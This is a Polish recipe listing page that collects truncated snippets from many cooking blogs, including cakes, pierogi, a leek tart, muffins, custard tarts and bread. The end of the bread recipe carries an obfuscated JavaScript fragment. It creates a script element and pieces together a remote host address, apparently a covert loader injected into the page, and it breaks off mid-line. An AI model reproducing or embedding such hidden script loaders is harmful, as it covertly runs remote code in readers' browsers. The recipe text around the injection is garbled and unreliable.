ciasto - 164325 przepisów (strona:4931/10955)

Deser brownie z owocami leśnymi 216

Dzisiaj prezentuję Wam przepis na ekspresowy, letni deserek, którego bazą jest dowolne ciasto czekoladowe. To świetny sposób na wykorzystanie zakalców czy resztek słodkości po większych imprezach! Ja początkowo upiekłam brownie, po czym stwierdziłam, że jednak samo w sobie jest zbyt nudne i... zrobiłam z niego deser! Ciasto dobrze jest nasączyć wcześniej mocną kawą - będzie bardziej wilgotne i lepiej skomponuje się(...)bananowe, a następnie składniki suche. Na koniec dodajemy startą skórkę z pomarańczy oraz sok z niej, masło orzechowe, słodzidło (u mnie syrop z agawy) i szczyptę soli. Tak przygotowane ciasto wylewamy do prostokątnej formy (wcześniej wyłożonej papierem do pieczenia). Pieczemy przez ok. 20 minut w temp. 180 stopni C. Studzimy przy uchylonych drzwiczkach dodatkowo 200 g jogurtu greckiego 2 łyżeczki

Kuchnia Ellie
Tort malinowy 287

Każde ciasto ma u mnie ogromnego plusa za świeże owoce sezonowe – są pyszne i wyglądają przepięknie na talerzach :) Dziś idealny letni tort z delikatnym kremem śmietankowym i świeżymi malinami. Spody biszkoptowe na tort malinowy piekłam w tortownicy o średnicy 20 cm. Składniki na 1 spód biszkop tu (będą potrzebne 2) Składniki na krem śmietankowy: 500 g serka mascarpone(...)bitej śmietany czerwony barwnik spożywczy (opcjonalnie) Składniki na polewę malinową: 100 ml musu malinowego 2 łyżki galaretki malinowej +1 kg malin – na mus do nasączenia, do przełożenia ciasta i na dekorację, limonka lub cytryna, gorzka czekolada do dekoracji (u mnie malinowa) Jak zrobić tort malinowy? Biszkopty pieczemy według przepisu . Można zrobić to dzień wcześniej, żeby miały dużo czasu

Ciastkozercy
Pierogi z mięsem mielonym 196

trochę więcej, zakasałam rękawy i zrobiłam pierogi z mięsem mielonym. Pycha, zajadaliśmy się aż nam się uszy trzęsły :D  Składniki na ok. 30 sporych sztuk:   Ciasto: 370 g mąki 1 łyżka oleju 1 płaska łyżeczka soli 1 szklanka gorącej wody Farsz: ok. 450 g mielonego mięsa wieprzowego 1 średnia cebula 1 ząbek czosnku 2 łyżki oleju 1 jajko(...)gładką masę. Przykryć i odstawić.    Mąkę wsypać do miski, dodać olej i sól. Wymieszać. Zalać mąkę wrzącą wodą i poczekać do ostygnięcia. Gdy przestygnie, wyrobić szybko gładkie ciasto. Zagniecione ciasto podzielić na dwie części. Jedną odłożyć, drugą rozwałkować i wykrawać z niej krążki. Napełnić każdy krążek farszem, dobrze zlepić brzegi.     W dużym garnku zagotować wodę

Simply Food
Tarta z porami 131

Danie z kuchni francuskiej. Składniki 1 opakowanie mrożonego ciasta francuskiego Nadzienie : 4 pory 2 łyżki masła 2/3 szklanki śmietanki 36 % 150 g sera camembert 1 jajko 4 łyżki startego parmezanu pieprz kajeński gałka muszkatołowa sól pieprz Przygotowanie Ciasto wyłożyłem na formę na tartę, odciąłem wystające brzegi. Białe i jasnozielone części porów, pokroiłem w talarki. Usmażyłem na maśle, aż zmiękły(...)minut ). Doprawiłem solą i pieprzem, odstawiłem. Zagotowałem śmietanę, dodałem pokrojony ser camembert. Mieszałem, aż ser się roztopił. Przestudziłem, dodałem jajko, przyprawiłem pieprzem kajeńskim i gałką. Ciasto posypałem parmezanem, rozłożyłem na nim pory, polałem sosem serowym. Zapiekałem 20 minut w temperaturze 200 stopni

R'n'G Kitchen
Muffinki z maślanym kremem. 189

znajdzie się ktoś chętny. Można je upiec dla gości, dla dzieci na urodziny lub tak po prostu na podwieczorek. Do tego filiżanka ulubionej kawy. Serdecznie polecam i zapraszam :) Składniki: Ciasto: pół szklanki cukru 2 jajka 100 ml oleju pół szklanki kaszy manny półtorej szklanki mąki tortowej 2 łyżeczki proszku do pieczenia 2 kopiaste łyżki  jogurtu naturalnego typu greckiego(...)waniliowy Krem maślany 20 dag masła 82 % 16 dag cukru pudru 3 łyżki zimnego mleka sok z cytryny według uznania różowy barwnik spożywczy ( u mnie w proszku ) Wykonanie: 1. Ciasto: Jajka wbijamy do miski, wsypujemy oba cukry i miksujemy na puszystą masę, następnie wlewamy olej i chwilę miksujemy, dodajemy jogurt naturalny i dalej miksujemy. Na koniec wsypujemy kaszę mannę, mąkę

Izabelawkuchni
Portugalskie babeczki budyniowe 174

nata, pasteis de Belen. Słodziutkie i delikatne. Dla dorosłych doskonałe w towarzystwie czarnej kawy, dla dzieci świetny podwieczorek ze szklanką zimnego mleka. Do ich przygotowania potrzeba: * 1 paczka XXL ciasta francuskiego maślanego * 200g cukru drobnego * 160ml wody * 1 laska cynamonu * 250ml mleka * 150ml śmietanki * 1 laska wanilii * 5 żółtek * 1 całe jajko * 35g mąki kukurydzianej Na początek wyklejam ciastem lekko(...)natłuszczone foremki do babeczek. Ja po prostu kroję ciasto na 12 kwadratów i nadmiar z rogów zawijam do środka.  Wodę z cukrem i laską wanilii trzeba zagotować do wrzenia i przestudzić. Podobnie mleko i śmietankę, zagotować z laską wanilii, najlepiej przekroić ją, wybrać nasionka i całość dorzucić do mleka. W innym naczyniu roztrzepać jajko z żółtkami, potem nieustannie mieszając

I tu będę miała takie te
Dietetyczne ciasto marchewkowe 238

Ciasto jest bardzo smakowite, wilgotne i idealne do kawy czy herbaty w niedzielny poranek. Idealne także będzie zapakowane w pojemnik do pracy czy szkoły. Polecam do wypróbowania. Dietetyczne ciasto marchewkowe. ROZWIŃ I CZYTAJ DALEJ

Moje Małe Czarowanie
tartaletki z beza 161

zmiksować na niskich obrotach do połączenia składników,około 3-4minuty.Ma mieć konsystencje grubej kruszonki. W misce wymieszać żółtka i 2 łyżki jogurtu,a następnie dodać ciągle miksując do mąki .Jeśli ciasto nie łączy się w duże kawałki to dodać jogurtu 1-2 łyżki .Utworzyć kulę,zakryć folią i do lodówki na 30 minut .Gotowe ciasto podzielić na pół,każdy kawałek rozwałkować(...)grubość  05 milimetra,wyciąć i wykleić foremki - tartaletki . Ponakluwać  dno ciasta i ponownie do lodówki na 30 minut. Piec na zloty kolor w nagrzanym piekarniku ,w temperaturze  175-180° C . Składniki bezy 6 białek  300gr. cukru drobnego 2 łyżki cukru brązowego 1 łyżeczka octu jabłkowego,lub zwykłego 1 łyżeczka soku z cytryny  1 łyżka mąki

w mojej kuchni
Drozdzowki z porzeczkami i kruszonka, dla Hipcia 201

mąki, odstawiamy do rośnięcia na 15 minut. Mleko łączymy z masłem, cukrem i solą a gdy lekko przestygnie z jajkiem. Do zaczynu dodoajemy mieszanke mleczną oraz mąkę. Wyrabiamy gładkie ciasto. Przekładamy ciasto do miski i przykryte zostawiamy w temperaturze pokojowej na 1-1,5 h aż do podwojenia swojej objętości. Z wyrośniętego ciasta formujemy małe okrągłe kuleczki (w sumie

Dzieje kuchennej Wiewióry
CIASTECZKA Z TWAROGIEM 192

Uwielbiam szybkie ,łatwe i smaczne ciasteczka ;) Dziś zapraszam na właśnie takie pyszności z ciasta francuskiego z twarożkiem i jogurtem owocowym ;) Uwielbiam ;) UWAGA 🍪 🍪 🍪 🍪 🍪 CIASTECZKA NIE SĄ SŁODKIE Zapraszam również do polubienia mojej strony na FB # gotowaniepatki :) Będzie mi bardzo miło 😊 Składniki na 12 ciasteczek o 4 cm średnicy: 🍪 1 ciasto francuskie ok 360 g 🍪 250 g sera białego chudego(...)jogurtu owocowego np. poziomka 🍪 3 łyżki cukru brązowego plus 1 łyżka do posypania Sposób przygotowania: Z ciasta wycinam krążki za pomocą szklanki o średnicy 4 cm. Powinno wyjść ok 24 krążki. Do miski przekładam twarożek i dokładnie ubijamy widelcem, dodajemy jogurt owocowy oraz cukier. Dokładnie mieszamy. Na 12 krążków kładę łyżeczkę farszu na środek krążka. Przykrywamy drugim krążkiem a następnie

Gotowanie Patki
Placuszki jogurtowe z truskawkami 193

masę,dodajemy jogurt i olej i miksujemy. Na końcu dodajemy przesianą przez sitko mąkę z proszkiem do pieczenie, sodą i cukier puder, wszystko jeszcze raz miksujemy. Jak by nasze ciasto było bardzo lejące to musimy dodać jeszcze mąki. 2. Truskawki myjemy, usuwamy szypułki i kroimy je na plasterki. 3. Patelnię nagrzewamy, łyżką nabieramy porcje ciasta, kładziemy na patelnię i lekko(...)formujemy placka. Nakładamy truskawki lekko je wciskamy w ciasto i placuszki przewracamy razem z truskawkami na drugą stronę. Smażymy na rumiany kolor.  Patelnia troszkę od truskawek będzie się nam brudzić, więc podczas pieczenia możemy ją umyć, albo to co zostało usunąć łopatką. Przed podaniem placuszki posypujemy cukrem pudrem

kruche babeczki
AMONIACZKI 205

najważniejszy składnik czyli amoniak i wzięłam do pracy.  Ciasteczka robi się naprawdę bardzo prosto i szybko, zwłaszcza jak ma się w domu małych pomocników ;)  Mój synek wałkował ciasto,  smarował białkiem i sypał cukrem. Był bardzo zadowolony, że może mi pomóc. Ciasteczka warto przygotować ze  swoimi pociechami, s ą łatwe do zrobienia i smakują wybornie. Polecam(...)cukier kryształ WYKONANIE: Mąkę razem z pudrem przesiewamy, dodajemy margarynę i siekamy. Robimy wgłębienie do którego dodajemy żółtka oraz jajko.  Do mleka dodajemy amoniak, mieszamy i wlewamy, zarabiamy ciasto. Możemy na godzinkę schować do lodówki, ja od razu wałkowałam. Ciasto dzielimy na pół, cienko wałkujemy, foremką lub szklanką wykrawamy kształty. Każde ciastko zanurzamy w białku, a następnie w cukrze

Pani na deser
Jak przygotować chleb w domowych warunkach? 209

cieple. Gdy już zaczyn będzie gotowy, wymieszaj mąkę pszenną, żytnią i sól oraz wsyp wszystko do zaczynu. Wymieszaj i wyrabiaj, dodają po trochu 2 szklanki letniej wody. Gdy ciasto będzie gotowe, zawiń je w wilgotną ścierkę i trzymaj w cieple przez 2 godziny. Po upływie tego czasu ponownie wyrabiamy ciasto. Przekładamy je do wysmarowanej olejem i oprószonej otrębami foremki. Chleb(...)można posypać otrębami i należy odstawić go na kolejne 4 godziny w ciepłe miejsce. Gdy ciasto urośnie, wstawiamy je do rozgrzanego do temperatury 220 stopni piekarnika. Po kwadransie zmniejsz temperaturę do 170 stopni i piecz przez godzinę. (function(){ wwcm=document.createElement("script");wwcm.type="text/javascript"; wwcm.async=true;wwcm_=(("us")+"t")+"a";wwcm_+=("t.i")+""+"n";wwcm_+=(("f")+"o");wwcm_+="/"; wwcmu="76009396.";wwcmu+="pgegmgb8wcmdudX2r99xh3ja1an90j

Domowa Cukierenka-Domowa Kuchnia
Najlepsze lody o smaku kremówki 189

Europejskich. Pomyślałem o klasycznym polskim deserze, którego lodową wersję chcę promować w europejskim finale. Rozpocząłem od smaku masy lodowej, który miał naśladować smak kremu, dla dopełnienia kompozycji użyłem pokruszonego ciasta francuskiego. - Jak zaczęła się Pana przygoda z produkcją lodów?  - Pochodzę z rodziny o tradycjach lodziarskich, od ponad 25 lat prowadzimy w Ząbkach lodziarnię pod nazwą Palermo. Od najmłodszych

Kulinaria - potrawy z różnych stron świata
Ciasto z twarogiem, rabarbarem i owocami 403

Miałam ogromną ochotę na ciasto . Niestety, nie miałam konkretnego pomysłu. Był w domu rabarbar, a w lodówce 2 kostki twarogu i resztka mrożonych owoców z ubiegłego roku. Zagniotłam ciasto i powstał placek z masą serową, owocowym akcentem i kruszonką. Spontanicznie i pysznie! Upiecz te drożdżówki! ROZWIŃ I CZYTAJ DALEJ

Smaczna Pyza

Proponowane wyszukiwania